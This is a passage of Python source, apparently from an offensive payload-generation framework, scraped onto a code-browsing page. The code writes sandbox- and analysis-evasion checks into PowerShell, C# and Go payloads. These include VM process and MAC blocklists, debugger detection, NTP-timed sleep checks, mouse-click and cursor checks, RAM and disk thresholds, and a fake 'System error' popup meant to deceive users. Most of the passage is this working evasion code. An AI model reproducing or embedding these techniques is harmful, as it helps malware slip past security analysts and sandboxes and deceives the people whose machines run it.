'\t' * num_tabs_required + 'if ((($secondTime - 2208988800) - $firstTime) >= ' + evasion_payload.required_options["SLEEP"][0] + ') {\n'410 # Add a tab for this check411 num_tabs_required += 1412 # Return check information413 return check_code, num_tabs_required414 elif evasion_payload.language == 'powershell':415 if evasion_payload.required_options["HOSTNAME"][0].lower() != "x":416 check_code += "if($env:computername -eq \"" + evasion_payload.required_options["HOSTNAME"][0].lower() + "\") {\n"417 num_tabs_required += 1418 if evasion_payload.required_options["UTCCHECK"][0].lower() != "false":419 standard_time_zone = evasion_helpers.randomString()420 daylight_time_zone = evasion_helpers.randomString()421 check_code += "$" + standard_time_zone + ' = [System.TimeZone]::CurrentTimeZone.StandardName\n'422 check_code += "$" + daylight_time_zone + ' = [System.TimeZone]::CurrentTimeZone.DaylightName\n'423 check_code += "if ($" + standard_time_zone + ' -ne "Coordinated Universal Time" -or $' + daylight_time_zone + ' -eq "Coordinated Universal Time") {\n'424 num_tabs_required += 1425 if evasion_payload.required_options["MINRAM"][0].lower() != "false":426 check_code += "if ((Get-Ciminstance Win32_OperatingSystem).TotalVisibleMemorySize/1048576 -gt 3) {\n"427 num_tabs_required += 1428 if evasion_payload.required_options["VIRTUALPROC"][0].lower() != "false":429 evidenceof_sandbox = evasion_helpers.randomString()430 sandbox_processes = evasion_helpers.randomString()431 running_processes = evasion_helpers.randomString()432 running_proc = evasion_helpers.randomString()433 sandbox_proc = evasion_helpers.randomString()434 check_code += '$' + evidenceof_sandbox + ' = New-Object System.Collections.ArrayList\n'435 check_code += '$' + sandbox_processes + ' = "vmsrvc", "tcpview", "wireshark","visual basic", "fiddler", "vmware", "vbox", "process explorer", "autoit", "vboxtray", "vmtools", "vmrawdsk", "vmusbmouse", "vmvss", "vmscsi", "vmxnet", "vmx_svga", "vmmemctl", "df5serv", "vboxservice", "vmhgfs"\n'436 check_code += '$' + running_processes + ' = Get-Process\n'437 check_code += 'ForEach ($' + running_proc + ' in $' + running_processes + ') {\n'438 check_code += '\tForEach ($' + sandbox_proc + ' in $' + sandbox_processes + ') {\n'439 check_code += '\t\tif ($' + running_proc + '.ProcessName | Select-String $' + sandbox_proc + ') {\n'440 check_code += '\t\t\tif ($' + evidenceof_sandbox + ' -NotContains $' + running_proc+ '.ProcessName) {\n'441 check_code += '\t\t\t\t[void]$' + evidenceof_sandbox + '.Add($' + running_proc + '.ProcessName)\n'442 check_code += '\t\t\t}\n'443 check_code += '\t\t}\n'444 check_code += '\t}\n'445 check_code += '}\n'446 check_code += 'if ($' + evidenceof_sandbox + '.count -eq 0) {\n'447 num_tabs_required += 1448 if evasion_payload.required_options["MINBROWSERS"][0].lower() != "false":449 browser_count = evasion_helpers.randomString()450 browser_keys = evasion_helpers.randomString()451 browser_key = evasion_helpers.randomString()452 check_code += '$' + browser_count + ' = 0\n'453 check_code += '$' + browser_keys + " = 'SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe', 'SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe', 'SOFTWARE\Mozilla'\n"454 check_code += 'ForEach ($' + browser_key + ' in $' + browser_keys + ') {\n'455 check_code += '\tif (Test-Path ("HKLM:\" + $' + browser_key + ')) {\n'456 check_code += '\t\t++$' + browser_count + '\n'457 check_code += '\t}\n'458 check_code += '}\n'459 check_code += 'if ($' + browser_count + ' -ge 2) {\n'460 num_tabs_required += 1461 if evasion_payload.required_options["BADMACS"][0].lower() != "false":462 sand_macs = evasion_helpers.randomString()463 bad_macs = evasion_helpers.randomString()464 current_macs = evasion_helpers.randomString()465 mac_addy = evasion_helpers.randomString()466 badmac_addy = evasion_helpers.randomString()467 check_code += '$' + sand_macs + ' = New-Object System.Collections.ArrayList\n'468 check_code += '$' + bad_macs + " = '00:0C:29', '00:1C:14', '00:50:56', '00:05:69', '08:00:27'\n"469 check_code += '$' + current_macs + ' = Get-WmiObject Win32_NetworkAdapterConfiguration | Select -ExpandProperty MACAddress\n'470 check_code += 'ForEach ($' + mac_addy + ' in $' + current_macs + ') {\n'471 check_code += '\tForEach ($' + badmac_addy + ' in $' + bad_macs + ') {\n'472 check_code += '\t\tif ($' + mac_addy + ' | Select-String $' + badmac_addy + ') {\n'473 check_code += '\t\t\t[void]$' + sand_macs + '.Add($' + mac_addy + ')\n'474 check_code += '\t\t}\n'475 check_code += '\t}\n'476 check_code += '}\n'477 check_code += 'if ($' + sand_macs + '.count -eq 0) {\n'478 num_tabs_required += 1479 if evasion_payload.required_options["MINPROCESSES"][0].lower() != "x":480 minimum_processes = evasion_helpers.randomString()481 running_procs = evasion_helpers.randomString()482 check_code += '$' + minimum_processes + ' = ' + evasion_payload.required_options["MINPROCESSES"][0] + '\n'483 check_code += '$' + running_procs + ' = (Get-Process).count\n'484 check_code += 'if ($' + running_procs + ' -ge $' + minimum_processes + ') {\n'485 num_tabs_required += 1486 if evasion_payload.required_options["DOMAIN"][0].lower() != "x":487 check_code += "if((Get-WMIObject -Class Win32_ComputerSystem).Domain -eq \"" + evasion_payload.required_options["DOMAIN"][0].lower() + "\") {\n"488 num_tabs_required += 1489 if evasion_payload.required_options["USERNAME"][0].lower() != "x":490 check_code += "if($env:username -eq \"" + evasion_payload.required_options["USERNAME"][0].lower() + "\") {\n"491 num_tabs_required += 1492 if evasion_payload.required_options["PROCESSORS"][0].lower() != "x":493 check_code += "if((Get-WMIObject -Class Win32_Processor).NumberOfLogicalProcessors -ge " + evasion_payload.required_options["PROCESSORS"][0].lower() + ") {\n"494 num_tabs_required += 1495 if evasion_payload.required_options["SLEEP"][0].lower() != "x":496 check_code += "[Byte[]]$NTPTransmit=,1*48;$NTPTransmit[0]=0x1B;[Byte[]]$secondTransmit=,1*48;$secondTransmit[0]=0x1B;$noAccess=$false;"497 check_code += "Try{$Socket=New-Object Net.Sockets.Socket([Net.Sockets.AddressFamily]::InterNetwork,[Net.Sockets.SocketType]::Dgram,[Net.Sockets.ProtocolType]::Udp);$Socket.Connect('us.pool.ntp.org',123);[Void]$Socket.Send($NTPTransmit);[Void]$Socket.Receive($NTPTransmit)}catch{$noAccess=$true};"498 check_code += "$runTotal=0;ForEach($Index in $NTPTransmit[40..43]){$runTotal=$runTotal*256+$Index};$firstTime=(New-Object DateTime(1900,1,1,0,0,0,[DateTimeKind]::Utc)).AddMilliseconds([UInt64]($runTotal*1000)).Second;"499 check_code += "Start-Sleep -s " + evasion_payload.required_options["SLEEP"][0] + ";"500 check_code += "Try{$NewSock=New-Object Net.Sockets.Socket([Net.Sockets.AddressFamily]::InterNetwork,[Net.Sockets.SocketType]::Dgram,[Net.Sockets.ProtocolType]::Udp);$NewSock.Connect('us.pool.ntp.org',123);[Void]$NewSock.Send($secondTransmit);[Void]$NewSock.Receive($secondTransmit);$NewSock.Close()}catch{$noAccess=$true};"501 check_code += "$runTotal=0;ForEach($Index in $secondTransmit[40..43]){$runTotal=$runTotal*256+$Index}\n"502 check_code += "if ((New-Object DateTime(1900,1,1,0,0,0,[DateTimeKind]::Utc)).AddMilliseconds([UInt64]($runTotal*1000)).Second - $firstTime -ge " + evasion_payload.required_options["SLEEP"][0] + " -or $noAccess) {\n"503 num_tabs_required += 1504 if evasion_payload.required_options["USERPROMPT"][0].lower() != "false":505 dialog_title = evasion_helpers.randomString()506 dialog_text = evasion_helpers.randomString()507 message_box = evasion_helpers.randomString()508 check_code += '$' + dialog_title + ' = "System error encountered!"\n'509 check_code += '$' + dialog_text + ' = "Error 0x8163819f - Please hit OK to continue"\n'510 check_code += '$' + message_box + ' = New-Object -COMObject WScript.Shell\n'511 check_code += '[void]$' + message_box + '.Popup($' + dialog_text + ',0,$' + dialog_title + ',0)\n'512 check_code += 'if ($true) {\n'513 num_tabs_required += 1514 # Return check information515 return check_code, num_tabs_required516 elif evasion_payload.language == 'cs':517 if evasion_payload.required_options["EXPIRE_PAYLOAD"][0].lower() != "x":518 RandToday = evasion_helpers.randomString()519 RandExpire = evasion_helpers.randomString()520 # Create Payload code521 check_code += '\t' * num_tabs_required + 'DateTime {} = DateTime.Today;\n'.format(RandToday)522 check_code += '\t' * num_tabs_required + 'DateTime {} = {}.AddDays({});\n'.format(RandExpire, RandToday, evasion_payload.required_options["EXPIRE_PAYLOAD"][0])523 check_code += '\t' * num_tabs_required + 'if ({} < {}) {{\n'.format(RandExpire, RandToday)524 # Add a tab for this check525 num_tabs_required += 1526 if evasion_payload.required_options["HOSTNAME"][0].lower() != "x":527 check_code += '\t' * num_tabs_required + 'if (System.Environment.MachineName.ToLower().Contains("{}")) {{\n'.format(evasion_payload.required_options["HOSTNAME"][0].lower())528 # Add a tab for this check529 num_tabs_required += 1530 531 if evasion_payload.required_options["TIMEZONE"][0].lower() != 'x':532 check_code += '\t' * num_tabs_required + 'if (TimeZone.CurrentTimeZone.StandardName != "Coordinated Universal Time") {\n'533 # Add a tab for this check534 num_tabs_required += 1535 536 if evasion_payload.required_options["DEBUGGER"][0].lower() != 'x':537 check_code += '\t' * num_tabs_required + 'if (!System.Diagnostics.Debugger.IsAttached) {\n'538 # Add a tab for this check539 num_tabs_required += 1540 #if evasion_payload.required_options["BADMACS"][0].lower() != 'x':541 # pass542 if evasion_payload.required_options["DOMAIN"][0].lower() != "x":543 check_code += '\t' * num_tabs_required + 'if (string.Equals("' + evasion_payload.required_options["DOMAIN"][0] + '", System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName, StringComparison.CurrentCultureIgnoreCase)) {\n'544 545 # Add a tab for this check546 num_tabs_required += 1547 if evasion_payload.required_options["PROCESSORS"][0].lower() != "x":548 check_code += '\t' * num_tabs_required + 'if (System.Environment.ProcessorCount >= {}) {{\n'.format(evasion_payload.required_options["PROCESSORS"][0])549 # Add a tab for this check550 num_tabs_required += 1551 if evasion_payload.required_options["USERNAME"][0].lower() != "x":552 rand_user_name = evasion_helpers.randomString()553 rand_char_name = evasion_helpers.randomString()554 check_code += '\t' * num_tabs_required + 'string {} = System.Security.Principal.WindowsIdentity.GetCurrent().Name;\n'.format(rand_user_name)555 check_code += '\t' * num_tabs_required + "string[] {} = {}.Split('\\\\');\n".format(rand_char_name, rand_user_name)556 check_code += '\t' * num_tabs_required + 'if ({}[1].Contains("{}")) {{\n\n'.format(rand_char_name, evasion_payload.required_options["USERNAME"][0]) 557 # Add a tab for this check558 num_tabs_required += 1559 if evasion_payload.required_options["SLEEP"][0].lower() != "x":560 561 check_code += '\t' * num_tabs_required + 'var NTPTransmit = new byte[48];NTPTransmit[0] = 0x1B; var secondTransmit = new byte[48]; secondTransmit[0] = 0x1B; var skip = false;\n'562 check_code += '\t' * num_tabs_required + 'var addr = Dns.GetHostEntry("us.pool.ntp.org").AddressList;var sock = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp);\n'563 check_code += '\t' * num_tabs_required + 'try { sock.Connect(new IPEndPoint(addr[0], 123)); sock.ReceiveTimeout = 6000; sock.Send(NTPTransmit); sock.Receive(NTPTransmit); sock.Close(); } catch { skip = true; }\n'564 check_code += '\t' * num_tabs_required + 'ulong runTotal=0;for (int i=40; i<=43; ++i){runTotal = runTotal * 256 + (uint)NTPTransmit[i];}\n'565 check_code += '\t' * num_tabs_required + 'var t1 = (new DateTime(1900, 1, 1, 0, 0, 0, DateTimeKind.Utc)).AddMilliseconds(1000 * runTotal);\n'566 check_code += '\t' * num_tabs_required + 'Thread.Sleep(' + evasion_payload.required_options["SLEEP"][0] + '*1000);\n'567 check_code += '\t' * num_tabs_required + 'var newSock = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp);\n'568 check_code += '\t' * num_tabs_required + 'try { var addr2 = Dns.GetHostEntry("us.pool.ntp.org").AddressList; newSock.Connect(new IPEndPoint(addr2[0], 123)); newSock.ReceiveTimeout = 6000; newSock.Send(secondTransmit); newSock.Receive(secondTransmit); newSock.Close(); } catch { skip = true; }\n'569 check_code += '\t' * num_tabs_required + 'ulong secondTotal = 0; for (int i = 40; i <= 43; ++i) { secondTotal = secondTotal * 256 + (uint)secondTransmit[i]; }\n'570 check_code += '\t' * num_tabs_required + 'if (((new DateTime(1900, 1, 1, 0, 0, 0, DateTimeKind.Utc)).AddMilliseconds(1000 * secondTotal) - t1).Seconds >= ' + evasion_payload.required_options["SLEEP"][0] + ' || skip) {\n'571 # Add a tab for this check572 num_tabs_required += 1573 # Return check information574 return check_code, num_tabs_required575 elif evasion_payload.language == 'go':576 rand_username = evasion_helpers.randomString()577 rand_error1 = evasion_helpers.randomString()578 rand_hostname = evasion_helpers.randomString()579 rand_error2 = evasion_helpers.randomString()580 rand_processor = evasion_helpers.randomString()581 rand_domain = evasion_helpers.randomString()582 if evasion_payload.required_options["USERNAME"][0].lower() != "x":583 check_code += rand_username + ", " + rand_error1 + " := user.Current()\n"584 check_code += "if " + rand_error1 + " != nil {\n"585 check_code += "os.Exit(1)}\n"586 check_code += "if strings.Contains(strings.ToLower(" + rand_username + ".Username), strings.ToLower(\"" + evasion_payload.required_options["USERNAME"][0] + "\")) {\n"587 num_tabs_required += 1588 if evasion_payload.required_options["HOSTNAME"][0].lower() != "x":589 check_code += rand_hostname + ", " + rand_error2 + " := os.Hostname()\n"590 check_code += "if " + rand_error2 + " != nil {\n"591 check_code += "os.Exit(1)}\n"592 check_code += "if strings.Contains(strings.ToLower(" + rand_hostname + "), strings.ToLower(\"" + evasion_payload.required_options["HOSTNAME"][0] + "\")) {\n"593 num_tabs_required += 1594 if evasion_payload.required_options["PROCESSORS"][0].lower() != "x":595 check_code += rand_processor + " := runtime.NumCPU()\n"596 check_code += "if " + rand_processor + " >= " + evasion_payload.required_options["PROCESSORS"][0] + " {\n"597 num_tabs_required += 1598 if evasion_payload.required_options["SLEEP"][0].lower() != "x":599 check_code += 'type ntp_struct struct {FirstByte,A,B,C uint8;D,E,F uint32;G,H uint64;ReceiveTime uint64;J uint64}\n'600 check_code += 'sock,_ := net.Dial("udp", "us.pool.ntp.org:123");sock.SetDeadline(time.Now().Add((6*time.Second)));defer sock.Close()\n'601 check_code += 'ntp_transmit := new(ntp_struct);ntp_transmit.FirstByte=0x1b\n'602 check_code += 'binary.Write(sock, binary.BigEndian, ntp_transmit);binary.Read(sock, binary.BigEndian, ntp_transmit)\n'603 check_code += 'val := time.Date(1900, 1, 1, 0, 0, 0, 0, time.UTC).Add(time.Duration(((ntp_transmit.ReceiveTime >> 32)*1000000000)))\n'604 check_code += 'time.Sleep(time.Duration(' + evasion_payload.required_options["SLEEP"][0] + '*1000) * time.Millisecond)\n'605 check_code += 'newsock,_ := net.Dial("udp", "us.pool.ntp.org:123");newsock.SetDeadline(time.Now().Add((6*time.Second)));defer newsock.Close()\n'606 check_code += 'second_transmit := new(ntp_struct);second_transmit.FirstByte=0x1b\n'607 check_code += 'binary.Write(newsock, binary.BigEndian, second_transmit);binary.Read(newsock, binary.BigEndian, second_transmit)\n'608 check_code += 'if int(time.Date(1900, 1, 1, 0, 0, 0, 0, time.UTC).Add(time.Duration(((second_transmit.ReceiveTime >> 32)*1000000000))).Sub(val).Seconds()) >= ' + evasion_payload.required_options["SLEEP"][0] + ' {'609 num_tabs_required += 1610 611 if evasion_payload.required_options["UTCCHECK"][0].lower() != "false":612 613 tzone_abbrev = evasion_helpers.randomString()614 tzone_offset = evasion_helpers.randomString()615 616 check_code += '_, ' + tzone_offset + ' := time.Now().Zone()\n'617 check_code += 'if ' + tzone_offset + ' != 0 {\n'618 num_tabs_required += 1619 620 if evasion_payload.required_options["USERPROMPT"][0].lower() != "false":621 622 title_box = evasion_helpers.randomString()623 message_box = evasion_helpers.randomString()624 user32_dll = evasion_helpers.randomString()625 messagebox_w = evasion_helpers.randomString()626 check_code += 'var ' + title_box + ' = "System Error Encountered"\n'627 check_code += 'var ' + message_box + ' = "System error 0x831d83a4 - Press OK to continue"\n'628 check_code += 'var ' + user32_dll + ' = syscall.NewLazyDLL("user32.dll")\n'629 check_code += 'var ' + messagebox_w + ' = ' + user32_dll + '.NewProc("MessageBoxW")\n'630 check_code += messagebox_w + '.Call(0,\n'631 check_code += '\tuintptr(unsafe.Pointer(syscall.StringToUTF16Ptr(' + message_box + '))),\n'632 check_code += '\tuintptr(unsafe.Pointer(syscall.StringToUTF16Ptr(' + title_box + '))),\n'633 check_code += '0)\n'634 check_code += 'if true {\n'635 num_tabs_required += 1636 637 if evasion_payload.required_options["RAMCHECK"][0].lower() != 'false':638 639 memstatusx = evasion_helpers.randomString()640 kernel32_dll = evasion_helpers.randomString()641 globalmem_status = evasion_helpers.randomString()642 mem_info = evasion_helpers.randomString()643 check_code += 'type ' + memstatusx + ' struct {\n'644 check_code += '\tdwLength\tuint32\n'645 check_code += '\tdwMemoryLoad\tuint32\n'646 check_code += '\tullTotalPhys\tuint64\n'647 check_code += '\tullAvailPhys\tuint64\n'648 check_code += '\tullTotalPageFile\tuint64\n'649 check_code += '\tullAvailPageFile\tuint64\n'650 check_code += '\tullTotalVirtual\tuint64\n'651 check_code += '\tullAvailVirtual\tuint64\n'652 check_code += '\tullAvailExtendedVirtual\tuint64\n'653 check_code += '}\n'654 check_code += 'var ' + kernel32_dll + ' = syscall.NewLazyDLL("kernel32.dll")\n'655 check_code += 'var ' + globalmem_status + ' = ' + kernel32_dll + '.NewProc("GlobalMemoryStatusEx")\n'656 check_code += 'var ' + mem_info + ' ' + memstatusx + '\n'657 check_code += mem_info + '.dwLength = uint32(unsafe.Sizeof(' + mem_info + '))\n'658 check_code += globalmem_status + '.Call(uintptr(unsafe.Pointer(&' + mem_info + ')))\n'659 check_code += 'if (' + mem_info + '.ullTotalPhys/1073741824 >= 3) {\n'660 num_tabs_required += 1661 662 if evasion_payload.required_options["PROCCHECK"][0].lower() != 'false':663 664 kernel32 = evasion_helpers.randomString()665 createtoolhelp = evasion_helpers.randomString()666 proc32first = evasion_helpers.randomString()667 proc32next = evasion_helpers.randomString()668 closehandle = evasion_helpers.randomString()669 procentry32 = evasion_helpers.randomString()670 ev_of_sandbox = evasion_helpers.randomString()671 sbox_procs = evasion_helpers.randomString()672 hproc_snap = evasion_helpers.randomString()673 exe_names = evasion_helpers.randomString()674 pe32 = evasion_helpers.randomString()675 ret_val = evasion_helpers.randomString()676 exe = evasion_helpers.randomString()677 sbox_process = evasion_helpers.randomString()678 check_code += 'var ' + kernel32 + ' = syscall.NewLazyDLL("kernel32.dll")\n'679 check_code += 'var ' + createtoolhelp + ' = ' + kernel32 + '.NewProc("CreateToolhelp32Snapshot")\n'680 check_code += 'var ' + proc32first + ' = ' + kernel32 + '.NewProc("Process32FirstW")\n'681 check_code += 'var ' + proc32next + ' = ' + kernel32 + '.NewProc("Process32NextW")\n'682 check_code += 'var ' + closehandle + ' = ' + kernel32 + '.NewProc("CloseHandle")\n'683 check_code += 'type ' + procentry32 + ' struct {\n'684 check_code += '\tdwSize\t\tuint32\n'685 check_code += '\tcntUsage\t\tuint32\n'686 check_code += '\tth32ProcessID\t\tuint32\n'687 check_code += '\tth32DefaultHeapID\t\tuintptr\n'688 check_code += '\tth32ModuleID\t\tuint32\n'689 check_code += '\tcntThreads\t\tuint32\n'690 check_code += '\tth32ParentProcessID\t\tuint32\n'691 check_code += '\tpcPriClassBase\t\tint32\n'692 check_code += '\tdwFlags\t\tuint32\n'693 check_code += '\tszExeFile\t\t[260]uint16\n'694 check_code += '}\n'695 check_code += ev_of_sandbox + ' := make([]string, 0)\n'696 check_code += sbox_procs + " := [...]string{`vmsrvc`, `tcpview`, `wireshark`, `visual basic`, `fiddler`, `vmware`, `vbox`, `process explorer`, `autoit`, `vboxtray`, `vmtools`, `vmrawdsk`, `vmusbmouse`, `vmvss`, `vmscsi`, `vmxnet`, `vmx_svga`, `vmmemctl`, `df5serv`, `vboxservice`, `vmhgfs`}\n"697 check_code += hproc_snap + ', _, _ := ' + createtoolhelp + '.Call(2,0)\n'698 check_code += 'defer ' + closehandle + '.Call(' + hproc_snap + ')\n'699 check_code += exe_names + ' := make([]string, 0, 100)\n'700 check_code += 'var ' + pe32 + ' ' + procentry32 + '\n'701 check_code += pe32 + '.dwSize = uint32(unsafe.Sizeof(' + pe32 + '))\n'702 check_code += proc32first + '.Call(' + hproc_snap + ', uintptr(unsafe.Pointer(&' + pe32 + ')))\n'703 check_code += 'for {\n'704 check_code += '\t' + exe_names + ' = append(' + exe_names + ', syscall.UTF16ToString(' + pe32 + '.szExeFile[:260]))\n'705 check_code += '\t' + ret_val + ', _, _ := ' + proc32next + '.Call(' + hproc_snap + ', uintptr(unsafe.Pointer(&' + pe32 + ')))\n'706 check_code += '\tif ' + ret_val + ' == 0 {\n'707 check_code += '\t\tbreak\n'708 check_code += '\t}\n'709 check_code += '}\n'710 check_code += 'for _, ' + exe + ' := range ' + exe_names + ' {\n'711 check_code += '\tfor _, ' + sbox_process + ' := range ' + sbox_procs + ' {\n'712 check_code += '\t\tif (strings.Contains(strings.ToLower(' + exe + '), strings.ToLower(' + sbox_process + '))) {\n'713 check_code += '\t\t\t' + ev_of_sandbox + ' = append(' + ev_of_sandbox + ', ' + exe + ')\n'714 check_code += '\t\t}\n'715 check_code += '\t}\n'716 check_code += '}\n'717 check_code += 'if len(' + ev_of_sandbox + ') == 0 {\n'718 num_tabs_required += 1719 720 if evasion_payload.required_options["MINPROCS"][0].lower() != 'x':721 722 kernel32 = evasion_helpers.randomString()723 createtoolhelp = evasion_helpers.randomString()724 proc32first = evasion_helpers.randomString()725 proc32next = evasion_helpers.randomString()726 closehandle = evasion_helpers.randomString()727 min_processes = evasion_helpers.randomString()728 procentry32 = evasion_helpers.randomString()729 hproc_snap = evasion_helpers.randomString()730 exe_names = evasion_helpers.randomString()731 pe32 = evasion_helpers.randomString()732 ret_val = evasion_helpers.randomString()733 exe = evasion_helpers.randomString()734 count_running_procs = evasion_helpers.randomString()735 wut = evasion_helpers.randomString()736 check_code += 'var ' + kernel32 + ' = syscall.NewLazyDLL("kernel32.dll")\n'737 check_code += 'var ' + createtoolhelp + ' = ' + kernel32 + '.NewProc("CreateToolhelp32Snapshot")\n'738 check_code += 'var ' + proc32first + ' = ' + kernel32 + '.NewProc("Process32FirstW")\n'739 check_code += 'var ' + proc32next + ' = ' + kernel32 + '.NewProc("Process32NextW")\n'740 check_code += 'var ' + closehandle + ' = ' + kernel32 + '.NewProc("CloseHandle")\n'741 check_code += 'type ' + procentry32 + ' struct {\n'742 check_code += '\tdwSize\t\tuint32\n'743 check_code += '\tcntUsage\t\tuint32\n'744 check_code += '\tth32ProcessID\t\tuint32\n'745 check_code += '\tth32DefaultHeapID\t\tuintptr\n'746 check_code += '\tth32ModuleID\t\tuint32\n'747 check_code += '\tcntThreads\t\tuint32\n'748 check_code += '\tth32ParentProcessID\t\tuint32\n'749 check_code += '\tpcPriClassBase\t\tint32\n'750 check_code += '\tdwFlags\t\tuint32\n'751 check_code += '\tszExeFile\t\t[260]uint16\n'752 check_code += '}\n'753 check_code += min_processes + ' := ' + evasion_payload.required_options["MINPROCS"][0] + '\n'754 check_code += hproc_snap + ', _, _ := ' + createtoolhelp + '.Call(2,0)\n'755 check_code += 'defer ' + closehandle + '.Call(' + hproc_snap + ')\n'756 check_code += exe_names + ' := make([]string, 0, 100)\n'757 check_code += 'var ' + pe32 + ' ' + procentry32 + '\n'758 check_code += pe32 + '.dwSize = uint32(unsafe.Sizeof(' + pe32 + '))\n'759 check_code += proc32first + '.Call(' + hproc_snap + ', uintptr(unsafe.Pointer(&' + pe32 + ')))\n'760 check_code += 'for {\n'761 check_code += '\t' + exe_names + ' = append(' + exe_names + ', syscall.UTF16ToString(' + pe32 + '.szExeFile[:260]))\n'762 check_code += '\t' + ret_val + ', _, _ := ' + proc32next + '.Call(' + hproc_snap + ', uintptr(unsafe.Pointer(&' + pe32 + ')))\n'763 check_code += '\tif ' + ret_val + ' == 0 {\n'764 check_code += '\t\tbreak\n'765 check_code += '\t}\n'766 check_code += '}\n'767 check_code += count_running_procs + ' := 0\n'768 check_code += 'for _, ' + exe + ' := range ' + exe_names + ' {\n'769 check_code += "\tif " + exe + " == \"\" {\n"770 check_code += "\t\tos.Exit(1)}\n"771 check_code += '\t' + count_running_procs + ' += 1\n'772 check_code += '}\n'773 check_code += 'if (' + count_running_procs + ' >= ' + min_processes + ') {\n'774 num_tabs_required += 1775 776 if evasion_payload.required_options["BADMACS"][0].lower() != 'false':777 778 evd_sandbox = evasion_helpers.randomString()779 bad_addrs = evasion_helpers.randomString()780 nics = evasion_helpers.randomString()781 single_nic = evasion_helpers.randomString()782 bad_mac = evasion_helpers.randomString()783 check_code += evd_sandbox + ' := make([]net.HardwareAddr, 0)\n'784 check_code += bad_addrs + ' := [...]string{`00:0C:29`, `00:1C:14`, `00:50:56`, `00:05:69`, `08:00:27`}\n'785 check_code += nics + ', _ := net.Interfaces()\n'786 check_code += 'for _, ' + single_nic + ' := range ' + nics + ' {\n'787 check_code += '\tfor _, ' + bad_mac + ' := range ' + bad_addrs + ' {\n'788 check_code += '\t\tif strings.Contains(strings.ToLower(' + single_nic + '.HardwareAddr.String()), strings.ToLower(' + bad_mac + ')) {\n'789 check_code += '\t\t\t' + evd_sandbox + ' = append(' + evd_sandbox + ', ' + single_nic + '.HardwareAddr)\n'790 check_code += '\t\t}\n'791 check_code += '\t}\n'792 check_code += '}\n'793 check_code += 'if len(' + evd_sandbox + ') == 0 {\n'794 num_tabs_required += 1795 796 if evasion_payload.required_options["CLICKTRACK"][0].lower() != 'x':797 798 usr32 = evasion_helpers.randomString()799 getkey_state = evasion_helpers.randomString()800 counter = evasion_helpers.randomString()801 min_clicks = evasion_helpers.randomString()802 lft_click = evasion_helpers.randomString()803 rght_click = evasion_helpers.randomString()804 check_code += 'var ' + usr32 + ' = syscall.NewLazyDLL("user32.dll")\n'805 check_code += 'var ' + getkey_state + ' = ' + usr32 + '.NewProc("GetAsyncKeyState")\n'806 check_code += 'var ' + counter + ' = 0\n'807 check_code += 'var ' + min_clicks + ' = ' + evasion_payload.required_options["CLICKTRACK"][0] + '\n'808 check_code += 'for ' + counter + ' < ' + min_clicks + ' {\n'809 check_code += '\t' + lft_click + ', _, _ := ' + getkey_state + '.Call(uintptr(0x1))\n'810 check_code += '\t' + rght_click + ', _, _ := ' + getkey_state + '.Call(uintptr(0x2))\n'811 check_code += '\tif ' + lft_click + ' % 2 == 1 {\n'812 check_code += '\t\t' + counter + ' += 1\n'813 check_code += '\t}\n'814 check_code += '\tif ' + rght_click + ' % 2 == 1 {\n'815 check_code += '\t\t' + counter + ' += 1\n'816 check_code += '\t}\n'817 check_code += '}\n'818 check_code += 'if true {\n'819 num_tabs_required += 1820 821 if evasion_payload.required_options["CURSORCHECK"][0].lower() != 'false':822 823 usr32 = evasion_helpers.randomString()824 cursor_position = evasion_helpers.randomString()825 point_struct = evasion_helpers.randomString()826 secs = evasion_helpers.randomString()827 point_var1 = evasion_helpers.randomString()828 point_var2 = evasion_helpers.randomString()829 check_code += 'type ' + point_struct + ' struct {\n'830 check_code += '\tx, y int32\n'831 check_code += '}\n'832 check_code += 'var ' + usr32 + ' = syscall.NewLazyDLL("user32.dll")\n'833 check_code += 'var ' + cursor_position + ' = ' + usr32 + '.NewProc("GetCursorPos")\n'834 check_code += secs + ' := 60\n'835 check_code += point_var1 + ' := ' + point_struct + '{}\n'836 check_code += cursor_position + '.Call(uintptr(unsafe.Pointer(&' + point_var1 + ')))\n'837 check_code += 'time.Sleep(time.Duration(' + secs + ' * 1000) * time.Millisecond)\n'838 check_code += point_var2 + ' := ' + point_struct + '{}\n'839 check_code += cursor_position + '.Call(uintptr(unsafe.Pointer(&' + point_var2 + ')))\n'840 check_code += 'if ' + point_var1 + '.x - ' + point_var2 + '.x == 0 && ' + point_var1 + '.y - ' + point_var2 + '.y == 0 {\n'841 num_tabs_required += 1842 843 if evasion_payload.required_options["DISKSIZE"][0].lower() != 'x':844 min_disk_size = evasion_helpers.randomString()845 kernel32 = evasion_helpers.randomString()846 getDiskFreeSpaceEx = evasion_helpers.randomString()847 lpFreeBytesAvailable = evasion_helpers.randomString()848 lpTotalNumberOfBytes = evasion_helpers.randomString()849 lpTotalNumberOfFreeBytes = evasion_helpers.randomString()850 cur_disk_size = evasion_helpers.randomString()851 check_code += min_disk_size + ' := float32(' + evasion_payload.required_options["DISKSIZE"][0] + ')\n'852 check_code += 'var ' + kernel32 + ' = syscall.NewLazyDLL("kernel32.dll")\n'853 check_code += 'var ' + getDiskFreeSpaceEx + ' = ' + kernel32 + '.NewProc("GetDiskFreeSpaceExW")\n'854 check_code += lpFreeBytesAvailable + ' := int64(0)\n'855 check_code += '\t' + lpTotalNumberOfBytes + ' := int64(0)\n'856 check_code += '\t' + lpTotalNumberOfFreeBytes + ' := int64(0)\n'857 check_code += getDiskFreeSpaceEx + '.Call(\n'858 check_code += '\tuintptr(unsafe.Pointer(syscall.StringToUTF16Ptr("C:"))),\n'859 check_code += '\tuintptr(unsafe.Pointer(&' + lpFreeBytesAvailable + ')),\n'860 check_code += '\tuintptr(unsafe.Pointer(&' + lpTotalNumberOfBytes + ')),\n'861 check_code += '\tuintptr(unsafe.Pointer(&' + lpTotalNumberOfFreeBytes + ')))\n'862 check_code += cur_disk_size + ' := float32(' + lpTotalNumberOfBytes + ')/1073741824\n'863 check_code += 'if (' + cur_disk_size + ' > ' + min_disk_size + ') {\n'864 num_tabs_required += 1865 # Return check information866 return check_code, num_tabs_required867 else:...

Full Screen

Full Screen

Automation Testing Tutorials

Learn to execute automation testing from scratch with LambdaTest Learning Hub. Right from setting up the prerequisites to run your first automation test, to following best practices and diving deeper into advanced test scenarios. LambdaTest Learning Hubs compile a list of step-by-step guides to help you be proficient with different test automation frameworks i.e. Selenium, Cypress, TestNG etc.

